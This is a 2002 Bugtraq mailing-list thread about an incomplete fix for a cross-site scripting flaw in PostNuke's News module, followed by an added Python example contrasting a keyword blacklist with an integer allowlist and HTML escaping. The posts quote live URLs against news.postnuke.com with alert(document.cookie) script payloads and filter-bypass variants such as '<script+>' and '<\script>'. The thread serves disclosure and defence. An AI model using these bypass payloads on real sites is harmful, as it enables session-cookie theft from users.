[27292] in bugtraq


Re: Postnuke XSS fixed

daemon@ATHENA.MIT.EDU (Muhammad Faisal Rauf Danka)
Thu Oct 3 23:16:08 2002

Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0
Date: Wed, 2 Oct 2002 16:24:15 -0700 (PDT)
From: Muhammad Faisal Rauf Danka <mfrd@attitudex.com>
To: Daniel Woods <dwoods@ucalgary.ca>
Reply-To: mfrd@attitudex.com
Message-Id: <20021002232415.CC1383986@sitemail.everyone.net>

I just checked it again:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>

where + denotes a blank space or similarly this one:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script%20>alert(document.cookie);</script>

resulting in the "Sorry - $HTTP_GET_VARS contains javascript..." message.

However the request:
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>

or any character inserted before the first "script" and after the first less-than sign "<", results in a DB Error, revealing nothing (user/pass/path etc.).

But I used IE and Netscape, maybe it's different with other browsers. :)

Regards
--------
Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202


--- Daniel Woods <dwoods@ucalgary.ca> wrote:
>
>Humm!
>
>> on 26th Sep the following url:
>> http://news.postnuke.com/modules.php
>>		?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>>
>> used to give Alert PopUp and
>> Error:
>> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
>> at line 23
>>
>> now it gives:
>> Sorry - $HTTP_GET_VARS contains javascript...
>>
>> Prompt fix by PostNuke team, great work Keep it up! :)
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
>  http://news.postnuke.com/modules.php
>	  ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
>Using the request...
>	  ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
>gives me the DB Error: message
>
>And using the request...
>	  ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
>gives me the Alert Popup and DB Error: message...  the '+' is treated as a blank.
>
>Thanks... Dan.

_____________________________________________________________
---------------------------
[ATTITUDEX.COM]
http://www.attitudex.com/
---------------------------
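Added illustration of the filter behaviour discussed in this thread, written here in Python and not taken from PostNuke's code: a keyword check that only looks for the literal "<script>" misses the "<script+>" and "<\script>" variants, while an allowlist check on sid (which should only ever be a positive article number) rejects all of them before anything reaches the database. The query strings are constructed from the three variants quoted above; the function names are my own.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed query strings reproducing the variants discussed in the thread,
# plus one legitimate request for comparison.
CASES = {
    "plain":     "op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>",
    "plus":      "op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>",
    "backslash": "op=modload&name=News&file=article&sid=<\\script>alert(document.cookie);</script>",
    "legit":     "op=modload&name=News&file=article&sid=42",
}


def sid_from_query(query: str) -> str:
    """Extract the decoded sid value; unquote_plus turns '+' and '%20' into a space,
    which is the decoding the thread observed in IE and Netscape."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "sid":
            return unquote_plus(value)
    return ""


def naive_blacklist_rejects(query: str) -> bool:
    """Weak filter: reject only if the decoded query contains the literal '<script>'.
    Assumption: this models the reported 'contains javascript' check, not the real PostNuke code."""
    return "<script>" in unquote_plus(query).lower()


def allowlist_rejects(query: str) -> bool:
    """Hardened check: sid must be a positive integer. Anything else is rejected,
    so the value can never change the SQL query or appear in an error message."""
    return re.fullmatch(r"[1-9][0-9]*", sid_from_query(query)) is None


def render_not_found(sid: str) -> str:
    """If a rejected value is ever echoed back, HTML-encode it instead of returning
    the raw DB error the thread describes; the browser then sees text, not markup."""
    return "Article not found: " + html.escape(sid, quote=True)


def demo() -> dict:
    """Summarise which check catches which variant."""
    return {name: (naive_blacklist_rejects(q), allowlist_rejects(q)) for name, q in CASES.items()}
```

demo() returns, per variant, a pair (blacklist rejects, allowlist rejects); only the plain "<script>" case trips the blacklist, whereas the allowlist rejects every non-numeric sid and accepts the legitimate one.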

